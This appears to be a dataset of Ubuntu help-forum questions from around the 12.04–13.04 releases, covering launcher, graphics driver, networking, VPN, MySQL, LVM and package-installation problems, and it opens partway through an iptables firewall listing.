tcpflags : 0x17/0x02 0 0 log tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcpflags : 0x17/0x04 limit : avg 1/sec burst 5 log flags 0 level 6 prefix `` inbound `` 0 0 drop tcp -- * * 0.0.0.0/0 0.0.0.0/0 tcpflags : 0x17/0x04 0 0 log icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 8 limit : avg 1/sec burst 5 log flags 0 level 6 prefix `` inbound `` 0 0 drop icmp -- * * 0.0.0.0/0 0.0.0.0/0 icmptype 8 32 2373 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 5/sec burst 5 log flags 0 level 6 prefix `` inbound `` 32 2373 drop all -- * * 0.0.0.0/0 0.0.0.0/0 chain lso ( 0 references ) pkts bytes target prot opt in out source destination 0 0 log_filter all -- * * 0.0.0.0/0 0.0.0.0/0 0 0 log all -- * * 0.0.0.0/0 0.0.0.0/0 limit : avg 5/sec burst 5 log flags 0 level 6 prefix `` outbound `` 0 0 reject all -- * * 0.0.0.0/0 0.0.0.0/0 reject-with icmp-port-unreachable chain outbound ( 1 references ) pkts bytes target prot opt in out source destination 4 336 accept icmp -- * * 0.0.0.0/0 0.0.0.0/0 375k 20m accept tcp -- * * 0.0.0.0/0 0.0.0.0/0 state related , established 331 25140 accept udp -- * * 0.0.0.0/0 0.0.0.0/0 state related , established 7583 563k accept all -- * * 0.0.0.0/0 0.0.0.0/0 i 'm completely out of ideas ( and helpful links ) at this point . any/all suggestions , hints , or encouraging words of sympathy would be appreciated at this point ! cheers , mike
300788	launcher in 13.04 does not always show when mouse touches the edge of the screen	i have a weird problem with the launcher ever since i upgraded from 12.04 to 13.04 . i 've set the launcher to auto-hide mode and whenever the pointer touched the left edge of the screen the launcher would pop out as expected . after upgrading to 13.04 the launcher sometimes fails to respond . i 've tweaked some parameters like sensitivity , acceleration etc through compizconfig but they do n't seem to change anything . what is troubling me is that this behavior seems to be completely random . sometimes it happens when there is a window attached to the side , sometimes not . even when it fails to appear the first time , if i try again and again , it will eventually appear . touching the top left corner of the screen with the mouse always shows the launcher . also , to make things even more random , it seems to me that the launcher usually fails to appear when i 'm using my bluetooth mouse . when this happens , i try my laptop 's trackpad , which does n't seem to help , but the red dot ( i 'm on an ibm thinkpad ) almost always works . if anyone has any idea at all , please share . it 's not a huge problem , but its randomness and lack of apparent explanation drives me mad . thanks so much !
300793	how can i copy files that are not bigger than 200mb using the terminal ?	the question says it all . i want to copy files in the terminal , but there are a few big files i do n't want to copy ( because they are backups ) . is there a command to do that ? something like cp -- max-size=200mb ? i know rsync has such an option . is that the way to go ?
300794	the system is running in low-graphic modes in virtualbox	before the software update yesterday , the system works well in virtualbox , after the software update , i have to reinstall the vbox addition , then , i reboot the system and the problem appeared , there are some details below ( i ca n't post images ) , so how to solve this problem ? hope someone can give a answer , thanks when i reinstalled the vbox addition , some error info below : `` building the virtualbox guest additions kernel modules '' `` the headers for the current running kernel were not found . if the following module compilation fails then this could be the reason. `` after i reboot the system , the problem appeared : `` the system is running in low-graphics mode '' `` your screen , graphics card , and input device settings could not be deteced correctly . you will need to configure these yourself . ''
300798	phpmyadmin login problem:	i use ubuntu 12.04 . recently i have installed xampp 1.8.1 in my system . i set password to : xampp pages , mysql/phpmyadmin , mysql root and ftp . but after that when i try to login to phpmyadmin page with username 'root ' and my assigned password , it does n't login and shows a page like : also when i click on 'cd collection ' item from the left panel of my xampp page it shows : warning : mysql_connect ( ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) in /opt/lampp/htdocs/xampp/cds.php on line 64 could not connect to database ! is mysql running or did you change the password ? oh ! another thing , i edited the /opt/lampp/etc/extra/httpd-xampp.conf file to : < directory `` /opt/lampp/phpmyadmin '' > allowoverride authconfig limit require all granted < /directory > but no success ... i am complete newbie to php , mysql , ftp and this xampp . could anyone please tell me how can i login to my phpmyadmin page ? ? ? did i do anything wrong ? ? ?
300799	does ubuntu 12.04 lts 32-bit have graphic user interface ?	i am new to virtualbox and vagrant . i followed vagrant get started guide , and have a virtualbox running ubuntu 12.04 lts 32-bit . http : //docs.vagrantup.com/v2/getting-started/index.html however , there 's no graphical user interface ( only a terminal ) . could anyone point me a box with a gui ?
300803	spotify-nonify.py script doesn`t work in ubuntu 13.04	when i was on ubuntu 12.10 i was using spotify-notify.py script which make spotify compatible with media buttons and there is a notifications showing when playing a song but on ubuntu 13.04 is no longer working is there any package missing or any solution that make that script working again click here to download the script file
300804	why do my gtk apps look ugly in kubuntu ?	i have recently upgraded ( clean install ) to kubuntu 13.04 and it is looking great and smooth as silk which is to be expected , however there is an ugly wrinkle in the silk as far as i know i have all of the relevant packages installed and as mentioned before this is on a clean install and i have the same problem over 3 machines on 64 and 32 bit and with and without proprietary graphics installed . so any idea 's people , anyone solved this problem on their own machine ?
300810	replace windows8 with ubuntu from dual-boot	i have an acer aspire 5349 , came with win7 preinstalled , but win8 installed as only os , so none of that uefi crap . recently installed ubuntu 13.04 as dual-boot ( not with wubi ) but now i want to remove my win8 partition ( around 420gb now ) and move my ubuntu partiton ( only about 80gb ) over so i can get my full 500gb ( technically ) for just ubuntu , and make it my only os . is that even possible since the windows 8 partition was there first ? also , i want to convert my windows 8 installation to a virtual pc in ubuntu , so i can still use it when i need the windows applications that ca n't be run in ubuntu . is there any way i can go about doing that ? thanks !
300811	windows 8 installation could n't find drives	i am trying to install windows on ubuntu using a bootable windows usb stick . basically i want to multi boot with ubuntu and windows 8 . however , on the `` where do you want to install windows ? '' installation windows , it does n't show any available drives . ! [ no visible drives in the windows 8 installation - how do i proceed ?
300813	unable to mount anything ; usb , internal drives ; do not have permissions ; help !	i am using ubuntu 12.04 lts on a usb on an hp pavillion . i posted a problem about removing thunderbird . i was advised to use gksu nautilus to become root , or as i understand it , superuser . i could never get it to work and i am now afraid i have screwed up my whole linux system . i ca n't get stuff to mount and then other stuff says it ca n't unmount ( see images ) i have read that either using sudu or gksu can possiblibly lock the user out entirely . it seems that i am completely locked out as an administrator i ca n't even access the system settings/user accounts ! i am now completely overwelmed . i even tried to create a new usb loaded with 12.10 and was willing to overwrite everything and start new , but without being able to mount another usb i ca n't even do that . i was going to ( in desparation ) try and run 13.04 from a dvd . i got as far as getting the iso and it 's files onto a dvd but now the dvd wo n't mount so i ca n't use it . have i screwed it all up with the gksu command or perhaps the sudu ? it definitely seems as if i 've lost any and all permissions . help ! ! ! ! !
300818	added second network adapter and ca n't get a connection from ether	i have since dropped the second ethernet adapter totally . i still could n't get it to work so i reinstalled ubuntu ( was working with a fresh install anyway ) the adapter worked fine to begin . then i tried to set the static settings in the interfaces file . it broke again . i could not start networking . reverted to the original settings , still nothing . the only other change i have made when all this started was enabling the onboard ethernet . but thats not showing up in the hardware at all . i am going to try disabling that and if that dosent work then go back to 12.10 . i am trying to bridge two ethernet adapters on my server . i have a second long range wireless ap that i want to network through the server . i tried adding br0 with all the proper settings on the interfaces file but that just broke the ethernet connection . i commented it out and went back to my normal setup . now the interfaces are down on boot . and when i manually put them up they go up but do not connect or use the static info in the interfaces file . i am happy to get more info that would be helpful . auto eth1 iface eth1 inet static address 192.168.2.9 netmask 255.255.255.0 gateway 192.168.2.1 network 192.168.2.0 broadcast 192.168.2.255 auto eth0 iface eth0 inet static address 192.168.2.3 netmask 255.255.255.0 gateway 192.168.2.1 network 192.168.2.0 broadcast 192.168.2.255 # auto br0 # iface br0 inet static # address 192.168.2.9 # netmask 255.255.255.0 # gateway 192.168.2.1 # network 192.168.2.0 # broadcast 192.168.2.255 # bridge_ports eth1 eth0 # bridge_fd 9 # bridge_hello 2 # bridge_maxage 12 # bridge_stp off also when i run sudo /etc/init.d/networking restart i get start : job failed to start
300821	why does nautilus open a new window when i click `` home folder '' while there is already a minimized one ?	i am using ubuntu 13.04 . whenever i click on `` home folder '' on unity it opens a new window while i already have one which i want to use . why is that happening in 13.04 ? it did not happen in the previous versions . how can i solve that ?
300832	run same command again but as root	sometimes when i run a command i do n't notice that i needed to run it as super user to have enough permission . is there a way to run the same command again but as a super user ?
300834	permission problems with lvm	when fiddling with ubuntu 12.04 lts ( precise pangolin ) server installed with lvm enabled , i accidentally tried to copy a 100 gb lvm file to an .iso file using the dd command into a 20 gb lvm . after this operation , i deleted the resulting .iso file to free space , but something was corrupted because i now have the following problem : i can create lvm files using lvcreate but once created , i can no longer access them or delete them . they appear under /dev/xen-vg ( xen-vg being my virtual group ) , but they are otherwise inaccessible . here is the result of ls -l : total 0 lrwxrwxrwx 1 root root 7 may 29 22:08 root - > ../dm-0 lrwxrwxrwx 1 root root 7 may 29 22:08 swap_1 - > ../dm-1 lrwxrwxrwx 1 root root 7 may 29 22:08 ubuntu-hvm - > ../dm-4 lrwxrwxrwx 1 root root 7 may 29 22:08 ubutnu-hvm1 - > ../dm-7 lrwxrwxrwx 1 root root 7 may 29 22:08 ubutnu-hvm2 - > ../dm-8 lrwxrwxrwx 1 root root 7 may 29 22:08 ubutnu-hvm-snapshot - > ../dm-6 lrwxrwxrwx 1 root root 7 may 29 22:08 zimbra-tk - > ../dm-2 if i try sudo lvremove /dev/xen-vg/ubuntu-hvm2 , i get : '' dev/xen-vg/ubuntu-hvm2 '' : invalid path for logical volume if i try xm create ... , i get : error : disk is n't accessible is there a way to fix this without re-installing the entire system ?
300836	initializing a software installation using a .bin installer	i recently switched to ubuntu , which means i 'm completely blanked when it comes to doing ... well , pretty much anything really . anyhow , i 'm trying to install maple 16 , using a .bin installation file to start the install wizard . my problem , however , lies in executing the actual file - i ca n't seem to access the file with a sudo chmod -x 'name of installation file ' command , and thus i ca n't access the install wizard . might some helpful soul walk me through how to do this ?
300838	pulseaudio is not working at all	i installed pulseaudio two weeks ago and since then i 've been trying to open it and it does n't . does anyone have any solution ? p.s . i have a horrible speaker set .
300839	my chromium web apps make a double icon	so i tried to get webapps for unity to work , and it 's being a major pain . i installed the chromium web apps extension . they `` work '' but whenever i open a webapp it also opens another chromium icon in the dash . so there 's one chromium icon that can open chromium windows , and another one that shows up only when a webapp is open . is this normal ? i tried uninstalling and reinstalling chromium but no luck .
300843	cant import photos with nautilus	i was using shotwell to import photos , but i could n't stand the way it forced me to use their event folder structure . i have read that nautilus will allow you to import photos , but i am not presented with any options to import them . it recognizes the pictures , but when i select open in the ubuntu photo viewer it says it ca n't see anything . however , when i go back to shotwell everything imports , it just does n't give me the control i want . any ideas on how i can use nautilus to import my photos ? i basically just want the ability to bulk name and determine which folders in my pictures drive they go to . any help would be much appreciated . thanks !
300844	install issues ?	i am currently installing ubuntu onto my laptop as windows 8 os has somehow dissapeared from my hdd and i was prompted with no bootable device everytime i started it up , now i went through everything as it came up on the screen and all went well however i am now at the stage were you can learn more about ubuntu as it installs but there is no progress bar at the bottom i can scroll through the pages and it shows me all the features of ubuntu however it doesnt say how far the install is along ? i am installing via usb and i have noticed that every now and then the led in my usb drive is flashing but still no progress bar ? is it best to just wait and see what happens ? im really confused thankyou in advance for any advice
300848	how to configure splash screen after plymouth	i have configured my splash screen for plymouth - and it works perfectly . i 've also configured the display manager ( i 'm using gdm ) . in between these two i get a very brief splash screen - a kind of swirl of multi-coloured ubuntu like colours . where does this splash screen get set , and how do i change it ? edit : here is a video of my boot sequence , showing the screen in question : http : //youtube.com/watch ? v=fmm6i-c7ga8
300849	how do i revert back from 12.04 to 10.xx ?	the migration to 12.04 sucks ! old menu system not even an option games icons not migrated over ... yes , you see them under downloads ... but not in the game folder itself accessories and computer management ... you should not have to use search ... the mouse was all about less key strokes ... ubuntu took a step backwards i set-up ubuntu for ed-ubuntu for a student ( 10.xx ) ... that meaning is lost now with 12.04 ... the file structure for games and the sub-directories too cumbersome starting interface screen needs to be user/file friendly the launcher is nothing more than a new wrapper for a dock ! bring back an option for a menu system that organizes application installed ... the file manager can be improved too !
300852	setting default editor for php files	i am using ubuntu 12.04 tls . i had installed netbeans on my pc . i want change default file to netbeans . i 've tried to right-click on a php file > properties > open with > show other application ; but there is no netbeans anywhere . how can i set the default program for opening php files ?
300856	trying to connection to a windows vpn	i 'm new to vpns in general and i 'd firgue learning how to do this on ubuntu would be a great start i 'm using pptd from the network manager . whenever i try and connect to the vpn that 's using window 's server , i get `` authenication required '' and it does n't connect . under the pptp advanced options i have mschap mschapv2 checked as well as mppe , and under security i have 128-bit slected . to get more information i checked the sys log and here is the information my system returning when i try and connect . may 27 15:49:29 austin-ubuntu networkmanager [ 973 ] : < info > starting vpn service 'pptp ' ... may 27 15:49:29 austin-ubuntu networkmanager [ 973 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 7139 may 27 15:49:29 austin-ubuntu networkmanager [ 973 ] : < info > vpn service 'pptp ' appeared ; activating connections may 27 15:49:29 austin-ubuntu networkmanager [ 973 ] : < info > vpn plugin state changed : init ( 1 ) may 27 15:49:29 austin-ubuntu networkmanager [ 973 ] : < info > vpn plugin state changed : starting ( 3 ) may 27 15:49:30 austin-ubuntu networkmanager [ 973 ] : < info > vpn connection 'help desk ' ( connect ) reply received . may 27 15:49:30 austin-ubuntu pppd [ 7143 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . may 27 15:49:30 austin-ubuntu pppd [ 7143 ] : pppd 2.4.5 started by root , uid 0 may 27 15:49:30 austin-ubuntu pppd [ 7143 ] : using interface ppp0 may 27 15:49:30 austin-ubuntu pppd [ 7143 ] : connect : ppp0 < -- > /dev/pts/2 may 27 15:49:30 austin-ubuntu networkmanager [ 973 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 27 15:49:30 austin-ubuntu networkmanager [ 973 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . may 27 15:49:30 austin-ubuntu pptp [ 7146 ] : nm-pptp-service-7139 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated may 27 15:49:30 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 1 'start-control-connection-request' may 27 15:49:30 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:739 ] : received start control connection reply may 27 15:49:30 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:773 ] : client connection established . may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 7 'outgoing-call-request' may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:858 ] : received outgoing call reply . may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:897 ] : outgoing call established ( call id 0 , peer 's call id 60546 ) . may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:950 ] : pptp_set_link_info received from peer_callid 0 may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:953 ] : send_accm is 00000000 , recv_accm is ffffffff may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 warn [ ctrlp_disp : pptp_ctrl.c:956 ] : non-zero async control character maps are not supported ! may 27 15:49:31 austin-ubuntu pppd [ 7143 ] : ms-chap authentication failed : e=649 no dialin permission may 27 15:49:31 austin-ubuntu pppd [ 7143 ] : chap authentication failed may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:950 ] : pptp_set_link_info received from peer_callid 0 may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_disp : pptp_ctrl.c:953 ] : send_accm is ffffffff , recv_accm is ffffffff may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 warn [ ctrlp_disp : pptp_ctrl.c:956 ] : non-zero async control character maps are not supported ! may 27 15:49:31 austin-ubuntu pppd [ 7143 ] : connection terminated . may 27 15:49:31 austin-ubuntu avahi-daemon [ 668 ] : withdrawing workstation service for ppp0 . may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < warn > vpn plugin failed : 1 may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) may 27 15:49:31 austin-ubuntu pptp [ 7146 ] : nm-pptp-service-7139 warn [ decaps_hdlc : pptp_gre.c:204 ] : short read ( -1 ) : input/output error may 27 15:49:31 austin-ubuntu pptp [ 7146 ] : nm-pptp-service-7139 warn [ decaps_hdlc : pptp_gre.c:216 ] : pppd may have shutdown , see pppd log may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ callmgr_main : pptp_callmgr.c:234 ] : closing connection ( unhandled ) may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ ctrlp_rep : pptp_ctrl.c:251 ] : sent control packet type is 12 'call-clear-request' may 27 15:49:31 austin-ubuntu pptp [ 7154 ] : nm-pptp-service-7139 log [ call_callback : pptp_callmgr.c:79 ] : closing connection ( call state ) may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < warn > vpn plugin failed : 1 may 27 15:49:31 austin-ubuntu pppd [ 7143 ] : exit . may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < info > vpn plugin state changed : stopped ( 6 ) may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < info > vpn plugin state change reason : 0 may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . may 27 15:49:31 austin-ubuntu networkmanager [ 973 ] : < info > policy set 'wired connection 1 ' ( eth0 ) as default for ipv4 routing and dns . may 27 15:49:37 austin-ubuntu networkmanager [ 973 ] : < info > vpn service 'pptp ' disappeared any help would be greatly appreciated .
300872	help installing libboost-system-dev , et al	i am trying to install gpu-ocelot , a gpu emulator , on a fresh install of ubuntu 12.04 . i am stuck at the following line of the installation instruction manual : sudo apt-get install libboost-dev libboost-system-dev libboost-filesystem-dev libboost-thread-dev i have managed to install the first of those ( libboost-dev , as version 1.48.0.2 ; the instructions suggest a version 1.46 or greater ) but the rest refuse to install . the precise error is ( in this case , for libboost-all-dev ) : e : package 'libboost-all-dev ' has no installation candidate running `` apt-cache policy '' for those packages reveals no install and no candidate . running `` apt-get update '' does not help . i am new to ubuntu ( getting the gpu-ocelot to work was my main goal in installing it in the first place ) but i gather i need to modify the /etc/apt/sources.list file , either manually or through the software center gui . but i do n't know what information to put in there or how i would go about finding the information . ( there are more apt-get steps following the one i 'm stuck on , which may or may not give me the same problem when i get to them . i would greatly appreciate knowing what to put into the sources.list file , but i would also appreciate knowing how you know that . )
300876	can i delete guestadditions.iso after i installed it and rebooted in virtual box ?	by the way i cant seem to get it to run smooth , i keep having a 10 second delay , ive given it 128mb of video memory . 1280mb of base memory & it is using one processor because my pc is coreduo .
300883	win8 dos not show ubuntu machine in networking	i have a ubuntu machine running several samba shares . my windows 7 pcs show this machine in file explorer under networking . when i click on it i can see my shares and access them . however my windows 8 laptop does not show the machine under networking . i have to tell windows to map the network drive and set it up that way . does anyone know how to get the comp to show up under networking so i do n't have to have each share mounted as a drive ? i just find it looks less cluttered in file explorer that way
300886	installing ubuntu 13.04 on hard drive with bad sectors	so i brought a second had laptop on the cheap , because i am very tight for money . going to be getting a new hard drive in about a month or so but in the mean time i want to install ubuntu 13.04 on the current drive ( its a 500gb drive with 2025 reallocated sectors ) . what i would like help with is finding a way to put the file system around the bad sectors , in order to not allow ubuntu to use them . i can install ubuntu fine but when i reboot to use the new installation i get loads of i/o errors and then get dropped to a busy box prompt . thanks in advance
300889	xubuntu 13.04 , intel video chip , bad color and video	i 'm using an intel mother board ( d865g sa ) , about a 2006 vintage , and using the built in video port . the video chip is intel 865g extreme graphics 2 . previous versions of xubuntu looked normal , but with 13.04 i seem to have degraded color depth . for example , the stock wallpapers are gradient images , and they appear with 'banding ' . also , any video looks really bad . i tested 13.04 on a new acer laptop and it looked great , and i checked the color palette settings to compare with the one i 'm having trouble with , and they were the same . i would guess the diagnostic process would consist of identifying whether or not this video device is still supported , then move on to identify if the video driver is faulty , missing or incorrect . any suggestions to put me on the right track ? thanks in advance .
300891	issue with font rendering inside applications	my current settings are : antialiasing : none hinting : full this has changed the appearance of fonts in menus , titlebars and most apps ( including skype , system settings , unity tweak tool , etc . ) however , fonts on websites in chrome and firefox are still rendering fonts as *antialiased . sorry if this has been posted before . all i 've been able to find is threads/questions about fonts being rendered poorly , but that is n't my issue . here is an example of the issue i 'm having . any ideas on how to fix this ?
300893	weird picture distortions	for some reason even after i updated the graphic drivers . i still get this weird picture on every video or moving advertisement . it 's a purple-green pixel texture that 's almost impossible to recognize what the original picture looked like ( not enough rep so i cant post an example ) . i 've tried installing and updating the drivers , and it 's still the same picture . i 'm currently using a toshiba satellite a45-s150 , lubuntu 13.04 . is there a problem with the specific chipset , or is there a driver that i 'm missing
300897	rabbitvcs - nautilus context menus disappearing	my nautilus context menus for rabbitvcs keep disappearing , even after a fresh reinstall of my ubuntu 12.04 desktop lts . when they disappear , the only way to get them back is to launch a terminal and run killall nautilus before running a fresh new nautilus instance . the emblems still work perfectly , and if i install thunar i have the opposite problem ( ca n't see the emblems but will always see the context menu options ) . could this be caused by the sheer number of repos/files i have checked out ?
300901	what are steps to install mysql ?	to my downloads directory , i have unpacked the mysql-server-5.6.11-2.linux_glibc2.5.i386.rpm . there is now a /usr directory with /bin , /lib , /sbin , and /share within the /usr . there is also a /etc directory with /init.d and /logrotate.d directories within the /etc . do i disperse these directories/files in the appropriate `` / '' root directory location ( s ) ? where can i find clear steps on how to install mysql on ubuntu ? ( i have version 13.04 ) from the mysql site , it seemed easier to do this for windows since they are able to use the mysql installer .
300912	how to install amd radeon hd 6470 graphics card driver and prevent the low graphics situation after restart ?	i have dell n4050 laptop with amd hd 6470 graphics card . i 'm new to linux . i installed ubuntu 13.04 64bit desktop version . i tried to install amd graphics driver but each time i restart , the same message pops up saying `` running on low graphics '' ( something like that ) . i installed ubuntu 3 times already but every time i install amd graphics i get the same message after restarting . so please , anyone give me detailed step on how to install amd graphics driver with amd catalyst control center .
300914	how to install graphic drivers properly	when i install the graphic drivers for my radeon hd 4200 the desktop dosent show up right , i dont see the left side bar or the top bar that shows the clock and everything , what am i doing wrong ?
300915	list files having more than 100 lines in a directory and in all it 's sub directory	how can i list files having more than 100 lines in a directory and in all its sub directories ? an example of such a terminal command will be very helpful . is there a tool to count the line numbers of given files ?
300917	changing directory permissions	hey i need to change the permissions of the /var/www directory but it wo n't let me . i 've tried the chmod command , i 've also tried it with sudo and still nothing . please help ! ! ! ( /home/hackmaster/desktop/sc.ora )
300919	ubuntu 13.04 network configuration	i recently bought a new linksys e3200 router , and after much trouble , got it working , but i can only connect to it via static wireless settings in my connections manager . i want it to be dhcp ( automatic ) , but then it automatically disconnects . also , i edited my /etc/network/interfaces to include : auto lo iface lo inet loopback iface eth0 inet dynamic which causes me to receive the warning `` now booting without network configuration '' .
300926	12.04.2 - sound blaster zx card detected , but no sound comes out of my headphones	i have been having issues with my sound blaster zx sound card in ubuntu 12.04.2 64-bit . pavucontrol detects sound from youtube videos and other things ( the sound meter jumps around with the sound ) , but i ca n't hear anything . i have tried killing pulseaudio , uninstalling pulseaudio , trying other headphones , and turning the computer off and then on again . ubuntu 12.04.2 64-bit kernel linux 3.5.0-31-generic
300928	how to run shell script via terminal using ubuntu 13.04 ?	i just upgraded to 13.04 . before this when i click on a shell script file it 'll give an option to run via terminal but now the option is no longer available and when i click the file it 'll directly open via gedit . how to run it via terminal and if possible , make it like that on default ?
300932	much background traffic	since i am working with dist . 13.04 i am experiencing much background traffic . i have a monthly limit of gb to down or upload . so it is burdening my balance . what i have done up to now : 1 . i have switched of ubuntu one from automatically synchronizing . but it showed no improvement . 2 . i switch on and off my internet connection according to my work . so i just have connection if i want to work in the internet . that has reduced heavily the daily background traffic balance but it is nasty . it was n't necessary before . i could stay online all the time without much background down/upload . what else can i do ?
300942	libssp.so.0 problem apt	i 'm trying to execute any kind of apt-get update ( or install .. ) . every operation brokes on this : i 've tried to autoremove packages , clean , -f , dist-upgrade - all unsuccessful ubuntu server 12.04
300943	the file or folder /media/partitionname/foldername does not exist . kubuntu . dolphin	situation . - after file backup - realigned my hard drive as disk utility was showing misalignment errors . - first tried resize/move on the partition named in the title , which failed . - simply deleted the partition and reformatted - restored files to revived partition . ( with same partition label ) - linux on bootup looks for the old one , asking user to press s for skip or m for manual - so /etc/fstab is edited to delete the old entry with the old uuid . - things work fine however : dolphin ( kde file manager ) still shows error message : the file or folder /media/partitionname/foldername does not exist . how does one stop dolphin from looking for the old location of partitionname ? note : ntfs configuration tool ( ntfs-config ) is also installed to automatically mount partitionname . this was already being regularly used before the partition was restored .
300951	xubuntu 12.10ca n't boot , ca n't login to tty ( x )	i 'm running xubuntu 12.10 , and i recently suffered a crash . when i tried to reboot , the system froze at `` stopping system v runlevel compatibility '' the advice for this tells me to go to tty1 via ctrl-alt-f1 , but when i do this i ca n't login . i enter my username and password , and the system says that these are wrong . all of the suggestions i can find for getting around this assume that i have some kind of access to the system . i 've got it running via a live-usb of 12.04 at the moment , but i do n't know how to alter anything from here .
300953	how can i improve battery life on my laptop ?	i have a macbook pro 6,2 . it uses nvidia optimus technology and would not work with bumblebee as the i915 driver would fail . i had to uninstall bumblebee , install nvidia-current , and blacklist nouveau and i915 to get my laptop up and running . so basically right now i 'm running solely on my dedicated gpu which means i get only about 2:30 hrs of battery life . am i stuck with this short battery life until nvidia provides proper support for their hardware ? thanks .
300955	after the command sudo apt-get upgrade i will get the error message ?	processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
300956	add a `` named '' path to .bashrc	i have an error of [ error ] android sdk not found . you might need to set android_sdk_home or android_sdk_root or android_home i have android sdk installed and , obviously , i have to add a line in .bashrc file saying where location of android sdk is . so i can do this : export path= $ path : /home/me123/android-sdk-linux/sdk but would it be treated as android_sdk_home , android_sdk_root or android_home ? and how do i add a `` named '' path to .bashrc ?
300957	how do i install libg2c	i was trying to run make 2d -j6 in=2dprograms/cd_2d_directsolver out=output/cd.exe command . while running this make file , the terminal rendered the following errors : g++ : error : ext_lib/g2c/libg2c_linux.so.0 : no such file or directory so i tried to install libg2c through the following command which did not work for me . sudo apt-get install libg2c0 i am running ubuntu 13.04-32 bit machine . it would great if somebody can help me with this .
300964	hp probook 4540s wifi and bluetooth not working in ubuntu 12.04lts	i am facing a issue after install ubuntu 12.04lts on my laptop ( hp probook 4540s ) . my wireless lan and bluetooth is not working . i got a list after put this command in terminal : lspci -nnk | grep -iea3 `` ( wireless|network ) '' ** result : network controller [ 0280 ] : ralink corp. device [ 1814:3290 ] subsystem : hewlett-packard company device [ 103c:18ec ] kernel driver in use : rt2860 kernel modules : rt3290sta i am not a expert in ubuntu.so kindly help me .
300970	problem report issue	i have been getting this issue ever since i installed 12.10 on my computer , it drives me to see a pop-up that said report a issue or something in does lines , is there a way i can take rid of it for good ?
300971	how to recover data from logical drive after upgrading from 12.04 to 13.04 ?	i was having 12.04 lts with 4 partitions , namely : 1.root partition ( ext2 ) 2.swap space 3.logical ( ntfs ) 4.logical ( ntfs ) the logical partitions had full of valuable data . i installed 13.04 by choosing the second option `` delete and install '' of the installation wizard . now , i have only two partitions . 1. root partition ( ext4 ) 2. swap space how can i recover my data from my previous 12.04 ? please help ... .. ! ! !
300972	places opens in disk usage analyzer in ubuntu 13.04	i have updated my ubuntu from 12.10 to latest ubuntu 13.04. everything is fine but when i go to places and click any place , it opens in disk usage analyzer by default and i found no way to either stop disk usage analyzer permanantely or to change the default application for places . please tell me how to set it default so that places opens properly . please see the image , i open places > music folder but it opens in i found similar question but the solution does n't works for me as i do edit /usr/share/applications/baobab.desktop and change mimetype=inode/directory ; with mimetype=inode/directory:1 ; and now everything opens in sublime-text note : i have many changes while i was using ubuntu 12.10 , still i am using session fallback desktop theme in latest ubuntu . does that affect ?
300974	workspace switching via ctrl + alt + arrow not working after upgrade to 13.04 , how to fix this ?	so , my update to 13.04 did n't go very well . due to the lack of a decent driver ( yes , i 'm unlucky to have a legacy driver which does n't play nice with the new xorg . ) , i had to mess around with stuff to first troubleshoot and afterwards `` fix '' my system . i 've finally got unity back , but now ctrlaltarrow and ctrlaltshiftarrow do n't work anymore . they are bound in `` keyboard '' > `` shortcuts '' , but nothing happens when i try it . a strange thing is that other keyboard shortcuts , like ctrlaltt to show terminal are still working . i noticed that ctrlaltarrow does n't show in the list with `` unity shortcuts '' ( the list that shows when you hold the super key ) . does anyone know how to re-enable this way of workspace switching ? i enabled workspaces in the appearance menu . it does n't have any effect though . switching via the workspace-switcher in the unity dash works fine though . ccsm is installed , but i ca n't seem to find a way to add keyboard bindings there . system : ubuntu 13.04 64bit
300977	why is wi-fi not working with terminal downloading ?	i usually use internet in my college where we have to use college proxies for downloading . as a result , i had updated my apt.conf file to include the information for the college proxies so that i could download and update using terminal . but now at home , when i tried downloading using broadband connection from terminal , it is always trying to connect to the college proxy even though i have removed the info from the apt.conf file . downloading from software center is ok but through terminal , its always trying to connect to the college proxy .
